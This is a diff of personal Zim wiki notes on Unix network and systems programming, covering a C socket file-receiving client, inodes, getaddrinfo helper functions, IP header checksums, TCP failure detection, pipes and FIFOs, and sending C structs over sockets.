s=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(s<0){
|
||||
perror(″获取SOCKET号失败!!!″);
|
||||
exit(2);
|
||||
}
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1500);/*端口号需与服务器程序使用的一致*/
|
||||
bcopy(hp->;h_addr,&sin.sin_addr,hp->;h_length);
|
||||
printf(″\n\n\t\t正在与服务器连接…″);
|
||||
if(connect(s,&sin,sizeof(sin),0)<0){
|
||||
perror(″不能与服务器连接!!!″);
|
||||
exit(3);
|
||||
}
|
||||
while((k=read(s,file,sizeof(file)))<=0/*接收文件名*/
|
||||
if((target=open(file,o_WRONLY|O_CREAT|O_TRUNC,0644))<0){
|
||||
perror(″不能打开目标文件!!″);
|
||||
exit(4);
|
||||
}
|
||||
strcat(strs,file);
|
||||
strcat(strs,″,稍候…″);
|
||||
write(1,strs,strlen(strs));
|
||||
while((k=read(s,buf,sizeof(buf)))>;0)
|
||||
write(tatget,buf,k);
|
||||
printf(″\n\n\t\t接收文件成功!!!\n″);
|
||||
close(s);
|
||||
close(target);
|
||||
}
|
||||
上述程序在Sco Unix System v3.2及Sco TCP/IP Rumtime环境下调试通过。
|
||||
94
Zim/Programme/APUE/What’s_an_inode.txt
Normal file
@@ -0,0 +1,94 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-10T00:08:47+08:00
|
||||
|
||||
====== What’s an inode ======
|
||||
Created 星期五 10 六月 2011
|
||||
http://www.linux-mag.com/id/8658/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+LinuxMagazine+%28Linux+Magazine%3A+Top+Stories%29
|
||||
In the electronic pages of Linux Magazine, file systems are commonly discussed. It’s a fact! In these discussions you might see the term “inode” used in reference to a file system. Fairly often people ask the question, “what is an inode?” so that they can understand the discussion (remember, there is no such thing as a bad question – at least for the most part).
|
||||
|
||||
To many people who read these storage articles this might seem like an elementary question but for many people just starting in Linux this concept may not be understood. Plus it’s always good to review the concept but let’s keep any comments civil and constructive (especially if they are directed at the author). Let me also state that I’m not a file system expert so please correct any misstatements but also please give references so people reading the comments can explore the topic.
|
||||
|
||||
File systems in general have two parts: (1) the metadata or the “data” about the data, and (2) the data itself. The first part, the metadata, may sound funny because it’s data about the data, but this is a very key component to file systems. It consists of information about the data. More precisely it includes information such as the name of the file, the date the file was modified, file owner, file permissions, etc. This type of information is key to a file system otherwise we just have a bunch of bits on the storage media that don’t mean much. Inodes store this metadata information and typically they also store information about where the data is located on the storage media.
|
||||
|
||||
inode
|
||||
|
||||
In general for *nix file systems, with each file or directory, there is an associated inode. As mentioned previously, this is where the metadata is stored and the inode is typically represented as an integer number. The origin of the term inode is not known with any certainty. From the wikipedia page about inodes, one of the original developers of Unix, Dennis Ritchie, said the following about the origin of the term inode:
|
||||
|
||||
In truth, I don’t know either. It was just a term that we started to use. “Index” is my best guess, because of the slightly unusual file system structure that stored the access information of files as a flat array on the disk, with all the hierarchical directory information living aside from this. Thus the i-number is an index in this array, the i-node is the selected element of the array. (The “i-” notation was used in the 1st edition manual; its hyphen was gradually dropped.)
|
||||
|
||||
How inodes are created and even if they are created, depends upon the specific file system. Several file systems create all of them when the file system is created resulting in a fixed number of inodes. For example, ext3 is a file system that does this. The result is that the file system has a fixed number of files that can be stored. Yes – it’s actually possible to have capacity on the storage and not be able to store any more data (it doesn’t happen often but it’s theoretically possible). If you need more inodes you have to remake the file system losing all data in the file system.
|
||||
|
||||
One way around the trap of a fixed number of inodes is some file systems use something called extents and/or dynamic inode allocation. These file systems can basically grow the file system and/or increase the number of inodes.
|
||||
|
||||
Inodes aren’t something mysterious that you should tiptop past but rather something that is part of Linux. For example, you can look at the inode for your files by simply using the “-i” option with “ls”. For example,
|
||||
|
||||
laytonjb@laytonjb-laptop:~/Documents/FEATURES/STORAGE088$ ls -il
|
||||
total 1024
|
||||
8847368 -rw-r--r-- 1 laytonjb laytonjb 115020 2011-04-24 07:33 Figure_1.png
|
||||
8847366 -rw-r--r-- 1 laytonjb laytonjb 39200 2011-04-24 07:38 Figure_2.png
|
||||
8847361 -rw-r--r-- 1 laytonjb laytonjb 30691 2011-04-24 07:40 Figure_3.png
|
||||
8847367 -rw-r--r-- 1 laytonjb laytonjb 28835 2011-04-24 07:42 Figure_4.png
|
||||
8847363 -rw-r--r-- 1 laytonjb laytonjb 115103 2011-04-24 07:43 Figure_5.png
|
||||
8847362 -rw-r--r-- 1 laytonjb laytonjb 125513 2011-04-24 07:44 Figure_6.png
|
||||
8847365 -rw-r--r-- 1 laytonjb laytonjb 77831 2011-04-24 07:44 Figure_7.png
|
||||
7790593 -rw-r--r-- 1 laytonjb laytonjb 15632 2011-04-26 19:40 storage088.html
|
||||
8847364 -rw-r--r-- 1 laytonjb laytonjb 183 2011-04-24 07:33 text1.txt
|
||||
3089319 drwxr-xr-x 2 laytonjb laytonjb 4096 2011-04-24 07:54 TRIM_WORKS
|
||||
5554211 -rw-r--r-- 1 laytonjb laytonjb 449110 2011-04-24 07:52 trim_works.tar.gz
|
||||
|
||||
|
||||
The number on the far left is the inode number associated with the file. Also notice that there is a directory “TRIM_WORKS” that also has an inode associated with it. Each time a file or directory is created or deleted, an inode is created or deleted.
|
||||
|
||||
Remember that in general, Linux is POSIX compliant which requires certain file attributes. In particular:
|
||||
|
||||
|
||||
The size of the file in bytes
|
||||
Device ID
|
||||
User ID of the file
|
||||
Group ID of the file
|
||||
The file mode that determines the file type and how the owner, group, and others (world) can access the file
|
||||
Additional system and user flags to further protect the file (note: this can be used limit the files use and modification)
|
||||
Timestamps telling when the inode itself was last change (ctime, changing time), the file content was last modified (mtime or modification time), and when the file was last accessed (atime or access time)
|
||||
A link counter that lists how many hard links point to the inode
|
||||
Pointers to the disk blocks that store the file’s contents (more on that later)
|
||||
|
||||
|
||||
Any Linux file system that is POSIX compliant must have this data contained in the inode for each file or be able to produce this information as though it had inodes. For example, ReiserFS does not use traditional inodes. Instead metadata, directory entries, inode block lists (more on that later), and tails of files are in a single combined B+ tree keyed by a universal object ID. So ReiserFS has to provide POSIX information when queried if it is to be considered POSIX compliant.
|
||||
|
||||
Inode Pointer Structure
|
||||
|
||||
In the POSIX definition of a file system, there is an item in the inode called an inode pointer structure. Remember that the inode just stores the metadata information including some sort of list of the blocks where the data is stored on the storage media. The inode pointer structure is the data structure universally used in the inode to list the blocks (or data blocks) associated with the file.
|
||||
|
||||
According to the wikipedia article, the structure used to have 11 or 13 pointers but most modern file systems use 15 pointers stored in the data structure. From wikipedia, for the case where there are 12 pointers in the data structure, the pointers are:
|
||||
|
||||
|
||||
Twelve points that directly point to blocks containing the data for the file. These are called direct pointers.
|
||||
One single indirect pointer. This pointer points to a block of pointers that point to blocks containing the data for the file.
|
||||
One doubly indirect pointer. This pointer points to a block of pointers that point to other blocks of pointers that point to blocks containing the data for the file.
|
||||
One triply indirect pointer. This pointer points to a block of pointers that point other blocks of pointers that point to other blocks of pointers that point to blocks containing the data for the file.
|
||||
|
||||
|
||||
To make things easier, Figure 1 below from wikipedia, shows these different types of pointers.
|
||||
|
||||
|
||||
|
||||
{{./Ext2-inode.gif}}
|
||||
Ext2-inode.gif
|
||||
|
||||
|
||||
|
||||
Figure 1: inode pointer structure (From wikipedia, Wikimedia Commons license)
|
||||
|
||||
|
||||
In the figure you can see the direct, indirect, and doubly indirect pointers. A triply indirect pointer is similar to the doubly indirect pointer with another level of pointers between the data blocks and the inode.
|
||||
|
||||
Summary
|
||||
|
||||
The concept of an inode is pretty fundamental to file systems within Linux and other *nix operating systems. Conceptually an inode is fairly easy to understand – it’s just the metadata about the data. This is, it contains information about the data itself that is very useful. For example it can contain the file and group owner of the file, the permissions on the file, and several time stamps. So when you execute commands in Linux, such as an “ls”, the metadata of all used inodes are scanned and the information is collected and presented to the user.
|
||||
|
||||
Some file system such as ext3 create all the inodes when the file system is created. Thus it is possible to run out of storage because all of the inodes are used yet the storage still has unused capacity. To help get around this other file systems such as ext4 and xfs, create inodes as needed.
|
||||
|
||||
Understanding the concept of an inode can be very useful for you to understand. Armed with the basic concepts of inodes you can examine various file systems and determine which one is right for you. You can also use the concept of an inode to understand why something as simple as “ls -l” takes so long. Hint – look at how many files you have and how many inodes ls much query to gather the information.
|
||||
|
||||
Jeff Layton is an Enterprise Technologist for HPC at Dell. He can be found lounging around at a nearby Frys enjoying the coffee and waiting for sales (but never during working hours).
|
||||
BIN
Zim/Programme/APUE/What’s_an_inode/Ext2-inode.gif
Normal file
|
After Width: | Height: | Size: 3.1 KiB |
226
Zim/Programme/APUE/getaddrinfo.txt
Normal file
@@ -0,0 +1,226 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:55:47+08:00
|
||||
|
||||
====== getaddrinfo ======
|
||||
Created Thursday 21 April 2011
|
||||
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=172427
|
||||
getaddrinfo使用详解 (2011-03-15 15:25)
|
||||
标签: getaddrinfo 套接字 主机地址转换 服务端口转换 分类: Socket网络编程
|
||||
|
||||
getaddrinfo是在gethostbyname系列函数不支持Ipv6的情况下逐渐催生的,其能够处理名字到地址以及服务到端口这两种转换,返回一个sockaddr结构的链表,这些sockaddr地址结构随后可有套接口函数(socket、bind、connect、listen等)直接调用,将协议相关性隐藏在该函数内部。应该尽量选择使用getaddrinfo函数代替之前的getxx函数族,就像应该使用inet_ntop(inet_pton)代替inet_aton, inet_addr等函数一样。
|
||||
|
||||
|
||||
|
||||
#include <netdb.h>
|
||||
|
||||
int getaddrinfo(const char* hostname, const char* service,
|
||||
|
||||
const struct addinfo* hints, struct addrinfo** result);
|
||||
|
||||
其中hostname可以是主机名后者地址串(Ipv4点分十进制数串或者Ipv6十六进制数串);service参数是一个服务名或者十进制端口号数串。与getaddrinfo相关的系统配置文件包括/etc/hosts、/etc/services,用于处理主机名与地址串、服务名与端口号之间的转换。
|
||||
|
||||
|
||||
|
||||
/etc/hosts存储地址与主机名的对应关系,如下例:
|
||||
|
||||
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
|
||||
|
||||
10.0.1.73 fedora11
|
||||
|
||||
|
||||
|
||||
/etc/services 则存储服务与端口号的对应关系,如下例:
|
||||
|
||||
tcpmux 1/tcp # TCP port service multiplexer
|
||||
|
||||
tcpmux 1/udp # TCP port service multiplexer
|
||||
|
||||
rje 5/tcp # Remote Job Entry
|
||||
|
||||
rje 5/udp # Remote Job Entry
|
||||
|
||||
echo 7/tcp #TCP echo
|
||||
|
||||
echo 7/udp #UDP echo
|
||||
|
||||
|
||||
|
||||
如果你的应用程序需要使用主机名代替IP地址,或服务名代替端口号,你需要先把对应关系增加到对应的配置文件中,否则getaddrinfo会解析出错。
|
||||
|
||||
|
||||
|
||||
有了getaddrinfo就可以很方便的构建服务器及客户端的应用程序,不用考虑数据尾端,地址转换等。tcp_listen根据host及service的信息获取sockaddr信息,创建套接字、绑定地址并监听。同样tcp_connect通过getaddrinfo返回的信息,连接服务器。创建udp的服务器与客户端与此类似。
|
||||
|
||||
|
||||
|
||||
tcp_listen(const char* host, const char* serv)
|
||||
|
||||
{
|
||||
|
||||
int listenfd, n;
|
||||
|
||||
const int on = 1;
|
||||
|
||||
struct addrinfo hints, *res, *ressave;
|
||||
|
||||
|
||||
|
||||
bzero(&hints, sizeof(struct addrinfo));
|
||||
|
||||
hints.ai_flags = AI_PASSIVE;
|
||||
|
||||
hints.ai_family = AF_INET;
|
||||
|
||||
hints.ai_socktype = SOCK_STREAM;
|
||||
|
||||
|
||||
|
||||
if((n = getaddrinfo(host, serv, &hints, &res)) != 0) {
|
||||
|
||||
printf("tcp_listen error for %s, %s: %s\n",
|
||||
|
||||
host, serv, gai_strerror(n));
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
ressave = res;
|
||||
|
||||
do {
|
||||
|
||||
listenfd = socket(res->ai_family, res->ai_socktype,
|
||||
|
||||
res->ai_protocol);
|
||||
|
||||
if(listenfd < 0) {
|
||||
|
||||
continue;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
|
||||
|
||||
if(bind(listenfd, res->ai_addr, res->ai_addrlen) == 0) {
|
||||
|
||||
break;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
close(listenfd);
|
||||
|
||||
}while((res = res->ai_next) != NULL);
|
||||
|
||||
|
||||
|
||||
if(res == NULL) {
|
||||
|
||||
printf("tcp_listen error for %s, %s: %s\n",
|
||||
|
||||
host, serv, gai_strerror(n));
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
listen(listenfd, BACK_LOG);
|
||||
|
||||
|
||||
|
||||
freeaddrinfo(ressave);
|
||||
|
||||
return(listenfd);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
int tcp_connect(const char* host, const char* serv)
|
||||
|
||||
{
|
||||
|
||||
int sockfd, n;
|
||||
|
||||
struct addrinfo hints, *res, *ressave;
|
||||
|
||||
|
||||
|
||||
bzero(&hints, sizeof(struct addrinfo));
|
||||
|
||||
hints.ai_family = AF_INET;
|
||||
|
||||
hints.ai_socktype = SOCK_STREAM;
|
||||
|
||||
|
||||
|
||||
if((n = getaddrinfo(host, serv, &hints, &res)) != 0) {
|
||||
|
||||
printf("tcp_connect error for %s, %s: %s\n",
|
||||
|
||||
host, serv, gai_strerror(n));
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
ressave = res;
|
||||
|
||||
do {
|
||||
|
||||
sockfd = socket(res->ai_family, res->ai_socktype,
|
||||
|
||||
res->ai_protocol);
|
||||
|
||||
if(sockfd < 0) {
|
||||
|
||||
continue;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
if(connect(sockfd, res->ai_addr, res->ai_addrlen) == 0) {
|
||||
|
||||
break;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
close(sockfd);
|
||||
|
||||
}while((res = res->ai_next) != NULL);
|
||||
|
||||
|
||||
|
||||
if(res == NULL) {
|
||||
|
||||
printf("tcp_connect error for %s, %s: %s\n",
|
||||
|
||||
host, serv, gai_strerror(n));
|
||||
|
||||
return -1;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
freeaddrinfo(ressave);
|
||||
|
||||
return(sockfd);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
49
Zim/Programme/APUE/how_do_i_calculate_a_checksum.txt
Normal file
@@ -0,0 +1,49 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T15:12:12+08:00
|
||||
|
||||
====== how do i calculate a checksum ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
typedef struct ip_header{
|
||||
unsigned char headlen:4; // header len
|
||||
unsigned char ver:4; // version
|
||||
unsigned char tos; // type of service
|
||||
unsigned short length; // pack3t length
|
||||
unsigned short id; // ident
|
||||
unsigned short offset; // frag offset
|
||||
unsigned char ttl; // time to live
|
||||
unsigned char proto; // protocol
|
||||
unsigned short sum; // checksum
|
||||
unsigned long source; // source addr
|
||||
unsigned long dest; // dest addr
|
||||
}IP_HEADER; /* 20 bytes */
|
||||
|
||||
|
||||
your question should be "how do i calculate a checksum" .... NOT "how do i convert a struct to a short".
|
||||
|
||||
the quick answer, is that you take your entire header and divide it into 2-byte "words", along their natural 16-bit boundaries, and perform a 1's complement addition on each word for a total checksum that is itself a 2-byte "word"
|
||||
|
||||
but before you do that, you've got a few potential problems, in that your header values do not align on the 16-bit boundaries.
|
||||
|
||||
your first two CHARs should not be individual 8-bit values, but should be concatenated into one total 8-bit value where VERSION is the 4 MSB's and HEADER LENGTH is the 4 LSB's. -- then that 8-bit value is itself concatenated with the TOS, where VERSION/HEADER are the 8 MSBs and the TOS is the 8 LSBs.
|
||||
|
||||
now you have your first "word"
|
||||
|
||||
LENGTH, ID, and OFFSET are your next three "words"... but it is important to note here that the first three (3) MSB's of the OFFSET are actually flag bits. (you may already know this and be handling it properly, but its not obvious from your structure.)
|
||||
|
||||
TTL and PROTOCOL are concatenated into the fifth "word", where TTL is the 8 MSB's and PROTOCOL is the 8 LSB's.
|
||||
|
||||
the HEADER CHECKSUM field will eventaully be the sixth "word" --- but for purposes of calculating this checksum in the first place, you ignore this field at this time (or pretend it is all zeros)
|
||||
|
||||
DESTINATION and SOURCE IP ADDRESSES are split into two words each for a total of four (4) words
|
||||
|
||||
now you have a total of nine (9) 16-bit words that you will add together, in "1's complement" fashion.
|
||||
|
||||
once you find the 1's complement sum of the 9 words, you put that 16-bit value in the checksum field.
|
||||
|
||||
and you're done.
|
||||
|
||||
|
||||
a final way to check this, that you've done it correctly -- and this is what is checked at each internet "hop" -- is that the 10 words of the IP header (including the checksum), all add up to 0xFFFF when added together in 1's complement fashion.
|
||||
|
||||
BIN
Zim/Programme/APUE/linux-file-struct.gif
Normal file
|
After Width: | Height: | Size: 5.4 KiB |
17
Zim/Programme/APUE/note.txt
Normal file
@@ -0,0 +1,17 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-02T22:14:44+08:00
|
||||
|
||||
====== note ======
|
||||
Created 星期四 02 六月 2011
|
||||
|
||||
为了确保在网络故障的情况下,比如网线拔出了,程序能立即检测到网络不通。
|
||||
我设想每次send 都让数据立即发送到网络上去,而不在系统发送缓冲区里等待。同时对方收到数据后立即确认。这样如果网线拔掉后数据将发送不出去,或者收不到回应。在现有的socket API下能否通过改变socket的选项来实现?(环境是RedHat Linux,以太网)。windows好象拔掉网线立即就检测到了
|
||||
现有TCP/IP协议栈只提供传输的可靠保证,并不提供应用的事务处理数据的可靠性保证,对于事务可靠性保证需要应用自己完成(可以使用接收确认+重发机制+心跳检测)
|
||||
实际数据的发送应该没法直接控制吧!即使TCPIP的数据已经提交,第二层协议要分析传输媒体是否可用,如果可以传输就发送,否则就要等待.
|
||||
用select函数,
|
||||
设置超时时间.如果socket就绪就send数据,如果send返回的字节与期望发送的字节数不一样
|
||||
就判断超时时间是否到达,到达了就返回发送失败,否则在剩下的时间内继续发送.这样可以保证你的数据在全部提交后正确返回.
|
||||
|
||||
TCP因为有流控和Nagle算法,所以要缓存。流控是无法避免的,跟网络有关。可做的是禁止Nagle算法,用setsockopt设置TCP_NODELAY选项。
|
||||
拔掉网线就检测到是网卡驱动的功能。但因为网络故障可能发生在任何位置,所以TCP不会中断连接(否则TCP就无法使用了)。TCP_KEEPALIVE是一个方法,不过时间太久,一般为7200s。所以好的办法仍然是用heartbeat,当然做到立即是不可能的,网络延时等等元素必须考虑在内。
|
||||
64
Zim/Programme/APUE/overview_of_pipes_and_FIFOs.txt
Normal file
@@ -0,0 +1,64 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-26T12:59:15+08:00
|
||||
|
||||
====== overview of pipes and FIFOs ======
|
||||
Created Sunday 26 February 2012
|
||||
|
||||
http://linux.die.net/man/7/pipe
|
||||
|
||||
===== Description =====
|
||||
__Pipes__ and __FIFOs__ (also known as named pipes) provide **a unidirectional interprocess communication channel.** A pipe has a read end and a write end. Data written to the write end of a pipe can be read from the read end of the pipe.
|
||||
|
||||
A pipe is created using __pipe(2)__, which creates a new pipe and returns** two file descriptors**, one referring to the read end of the pipe, the other referring to the write end. Pipes can be used to create a communication channel __between related processes__; see pipe(2) for an example.
|
||||
|
||||
A FIFO (short for First In First Out) __has a name within the file system__ (created using __mkfifo(3)__), and is opened using __open(2)__. Any process may open a FIFO, assuming the **file permissions** allow it. The read end is opened using the __O_RDONLY__ flag; the write end is opened using the __O_WRONLY__ flag. See fifo(7) for further details. Note: although FIFOs have a pathname in the file system, I/O on FIFOs does not involve operations on the underlying device (if there is one).
|
||||
|
||||
===== I/O on Pipes and FIFOs =====
|
||||
The only difference between pipes and FIFOs is the manner in which they are created and opened. Once these tasks have been accomplished, I/O on pipes and FIFOs has __exactly the same semantics__.
|
||||
|
||||
If a process attempts to read from an empty pipe, then __read(2) will block__ until **data is available(但不一定是read所要求的字节数)**. If a process attempts to write to a full pipe (see below), then __write(2) blocks__ until sufficient data has been read from the pipe to allow the write to complete.
|
||||
上述行为的前提是,管道的两端都没有关闭。
|
||||
|
||||
Nonblocking I/O is possible by using the __fcntl(2) F_SETFL__ operation to enable the __O_NONBLOCK__ open file status flag.
|
||||
|
||||
The communication channel provided by a pipe is__ a byte stream __: there is** no concept of message boundaries**.
|
||||
管道中传递的是**字节流**,而非有边界的消息。
|
||||
|
||||
If__ all file descriptors__ referring to the write end of a pipe have been closed, then an attempt to read(2) from the pipe will see__ end-of-file__ (read(2) will return 0). If all file descriptors referring to the read end of a pipe have been closed, then a write(2) will cause a __SIGPIPE __signal to be generated for the calling process. If the calling process is ignoring this signal, then write(2) fails with the __error EPIPE__.
|
||||
|
||||
An application that uses pipe(2) and fork(2) should use suitable close(2) calls __to close unnecessary duplicate file descriptors;__ this ensures that end-of-file and SIGPIPE/EPIPE are delivered when appropriate.
|
||||
|
||||
父进程和子进程__关闭各自不必要的文件描述符__是很必要的,假如子进程不关闭管道的写端fd[1],则子进程的read就不会返回EOF。同理,父进程如果不关闭管道的读端fd[0], 父进程的的write就不会收到EPIPE信号。这个规则同样适合于网络套接字,父进程应该关闭子进程使用的socketfd。
|
||||
|
||||
It is not possible to apply lseek(2) to a pipe.
|
||||
|
||||
===== Pipe Capacity(决定write是否阻塞) =====
|
||||
A pipe has a limited capacity. If the pipe is full, then a write(2) will block or fail, depending on whether the **O_NONBLOCK** flag is set (see below). Different implementations have different limits for the pipe capacity. Applications should not rely on a particular capacity: **an application should be designed so that a reading process consumes data as soon as it is available, so that a writing process does not remain blocked. **
|
||||
|
||||
当read process 消费数据较慢时,在管道没有写满的情况下,由于write不会被阻塞,因此**read 进程**__可能一次读到多个write的数据__**(PIPE中的数据是基于字节流的)**。
|
||||
|
||||
In Linux versions before 2.6.11, the capacity of a pipe was the same as the system page size (e.g., 4096 bytes on i386). Since Linux 2.6.11, the pipe capacity is __65536 bytes__.
|
||||
|
||||
===== Pipe_buf(决定write的内容是否是原子的,一般远小于管道容量) =====
|
||||
POSIX.1-2001 says that __write(2)s of less than PIPE_BUF bytes must be atomic__: the output data is written to the pipe as a contiguous sequence. Writes of more than PIPE_BUF bytes may be nonatomic: the kernel may interleave the data with data written by other processes. POSIX.1-2001 requires PIPE_BUF to be at least __512 bytes__. (On Linux, PIPE_BUF is 4096 bytes.) The precise semantics depend on whether the file descriptor is nonblocking (O_NONBLOCK), whether there are multiple writers to the pipe, and on n, the number of bytes to be written:
|
||||
|
||||
* O_NONBLOCK disabled, n <= PIPE_BUF
|
||||
All n bytes are** written atomically**; write(2) **may block **if there is not room for n bytes to be written immediately
|
||||
* O_NONBLOCK enabled, n <= PIPE_BUF
|
||||
If there is room to write n bytes to the pipe, then write(2) succeeds immediately, writing all n bytes; otherwise write(2) fails, with errno set to__ EAGAIN__.
|
||||
* O_NONBLOCK disabled, n > PIPE_BUF
|
||||
The write is **nonatomic**: the data given to write(2) may be interleaved with write(2)s by other process; the** write(2) blocks** until n bytes have been written.
|
||||
* O_NONBLOCK enabled, n > PIPE_BUF
|
||||
If the pipe is full, then write(2) fails, with errno set to__ EAGAIN__. Otherwise, from 1 to n bytes may be written (i.e., a "partial write" may occur; the caller should check the return value from write(2) to see **how many bytes** were actually written), and these bytes may be interleaved with writes by other processes.
|
||||
|
||||
write的内容是原子的意思是:__write的字符串不会与其它进程write的内容交错__。
|
||||
|
||||
|
||||
===== Open File Status Flags =====
|
||||
The only open file__ status flags __that can be meaningfully applied to a pipe or FIFO are **O_NONBLOCK and O_ASYNC**.
|
||||
|
||||
Setting the O_ASYNC flag for the read end of a pipe causes a signal (SIGIO by default) to be generated when new input becomes available on the pipe (see fcntl(2) for details). On Linux, O_ASYNC is supported for pipes and FIFOs only since kernel 2.6.
|
||||
|
||||
===== Portability notes =====
|
||||
On some systems (but not Linux), pipes are __bidirectional__: data can be transmitted in both directions between the pipe ends. According to POSIX.1-2001, pipes only need to be unidirectional. Portable applications should avoid reliance on bidirectional pipe semantics.
|
||||
109
Zim/Programme/APUE/send_struct_through_socket.txt
Normal file
@@ -0,0 +1,109 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:55:02+08:00
|
||||
|
||||
====== send struct through socket ======
|
||||
Created 星期六 04 六月 2011
|
||||
|
||||
You can send it using the same send function without having another
|
||||
char buffer.
|
||||
since a is an object of your struct you need to give the address of
|
||||
it.
|
||||
i.e
|
||||
send(sd, (void*)&a, sizeof(a), 0); will resolve your issue.
|
||||
|
||||
One thing you've to notice while dealing with structure variables.
|
||||
|
||||
the size of the structure will be aligned according the pack size you
|
||||
are specifying. Normally the default alignment for the structure
|
||||
members will be 4 bytes in size.
|
||||
|
||||
i.e if you declare
|
||||
|
||||
struct MyStruct
|
||||
{
|
||||
int a;
|
||||
char buff[21]; //Oops I meant 20 letters for name and extra one
|
||||
byte for null character
|
||||
};
|
||||
|
||||
You might be expecting a size 25 bytes for this structure but if you
|
||||
are giving alignment bytes 4, the size of the struct will be 28 bytes.
|
||||
(24 for buff and 4 for variable a)
|
||||
|
||||
As per your code you will be sending some extra bytes because of the
|
||||
alignment and you've to make sure that, at the client side too, you
|
||||
are having same structure alignment. else you may face some unexpected
|
||||
behavior.
|
||||
|
||||
You can specify the alignment using "#pragma pack" directive
|
||||
|
||||
#pragma pack(1) // alignment will be 1 byte you will get the exact
|
||||
size of members
|
||||
#pragma pack(2) // alignment will be 2 byte members will be aligned to
|
||||
2 bytes
|
||||
#pragma pack(4) // alignment will be 4 byte members will be aligned to
|
||||
4 bytes
|
||||
#pragma pack(8) // alignment will be 8 byte members will be aligned to
|
||||
8 bytes
|
||||
|
||||
Normally this will be set to the wordlength of the processsor. i.e 4
|
||||
bytes if you are using 32 bit architecture or 8 bytes if you are using
|
||||
64 bit architecture.
|
||||
and for strict size information we will use 1 byte alignment.
|
||||
|
||||
You can send any bytes you want. It's up to your send and recv code to
|
||||
deal with what the bytes mean. Note that you need the '&'
|
||||
|
||||
send(sd, (void*)&a, sizeof(a), 0);
|
||||
|
||||
|
||||
of course,structure object just a seriate memory buffer, the same as
|
||||
array of char or other, so you can using send() function to send the
|
||||
structure(memory)
|
||||
|
||||
|
||||
Don't forget only that different architectures has different
|
||||
endienless (little and big)
|
||||
So, when on the other side you receive a packet ()
|
||||
|
||||
recv(sd, (void*) &a, sizeof(a), 0);
|
||||
|
||||
the a.id maybe not 1(0x00000001), but (0x01000000)
|
||||
|
||||
Good Day
|
||||
--
|
||||
Alexander Pazdnikov
|
||||
|
||||
And if your struct has pointers to other types of data you must
|
||||
consider another way of sending your struct.
|
||||
|
||||
For ex.
|
||||
|
||||
struct tag_MyStruct {
|
||||
int a, b;
|
||||
fooStruct *pFoo;
|
||||
};
|
||||
|
||||
You will need to traverse those pointers and write the data to a
|
||||
single stream of bytes to send() the struct.
|
||||
|
||||
Sending raw struct's over the wire is a really bad idea, even between
|
||||
homogeneous systems.
|
||||
|
||||
Depending on the compiler used, different padding may be used.
|
||||
|
||||
So don't do that... for more advanced protocols ASN.1 is typically used,
|
||||
but for simpler applications, you can just define endian order of
|
||||
binary data, and pass each struct member along the wire.
|
||||
--------------
|
||||
Serialization
|
||||
|
||||
It is often necessary to send or receive complex datastructures to or from another program that may run on a different architecture or may have been designed for different version of the datastructures in question. A typical example is a program that saves its state to a file on exit and then reads it back when started.
|
||||
|
||||
The 'send' function will typically start by writing a magic identifier and version to the file or network socket and then proceed to write all the data members one by one (i.e. in serial). If variable length arrays are encountered (e.g. strings), it will either write a length followed by the data or it will write the data followed by a special terminator. The format is often XML or binary in which case the htonl() set of macros may come in handy.
|
||||
|
||||
The 'receive' function will be nearly identical : It will read all the items on by one. Variable length arrays are either handled by reading the count followed by the data, or by reading the data until the special terminator is reached.
|
||||
|
||||
Since these two functions often follow the same pattern as the declaration of the data(structures), it would be nice if they could all be generated from a common definition.
|
||||
|
||||
@@ -0,0 +1,102 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T23:57:14+08:00
|
||||
|
||||
====== Can I send a C struct to a socket ======
|
||||
Created 星期六 04 六月 2011
|
||||
|
||||
I'm trying to send a struct to a DGRAM socket. Here's what i'm doing:
|
||||
|
||||
client (sends struct)
|
||||
|
||||
Code:
|
||||
|
||||
n = sendto(socket_fd,(const char*)&mypdu,sizeof(mypdu),0,
|
||||
(struct sockaddr *)&server_addr,sizeof(server_addr));
|
||||
|
||||
server
|
||||
|
||||
Code:
|
||||
|
||||
n=recvfrom(socket_fd,buffer,sizeof(mypdu),0,
|
||||
(struct sockaddr *)&from,&fromlen);
|
||||
|
||||
but in the client, i initialized one of the fields with 100, and in the server end, that field has the value 3 =\
|
||||
|
||||
Can I send the whole struct without sending it field by field?
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
You will have to serialize the thing to send, and the receiver will need to reassemble the thing, very painfull.
|
||||
__________________
|
||||
|
||||
|
||||
Re: Can I send a C struct to a socket?
|
||||
You shouldn't send a whole struct at a time, in fact you shouldn't even send integers (int) "as-is".
|
||||
__I would memcopy the struct into a buffer and send the buffer __
|
||||
The problem with structs is that depending on the compiler, on the OS, on the architecture, ... there are different padding conventions that apply.
|
||||
|
||||
|
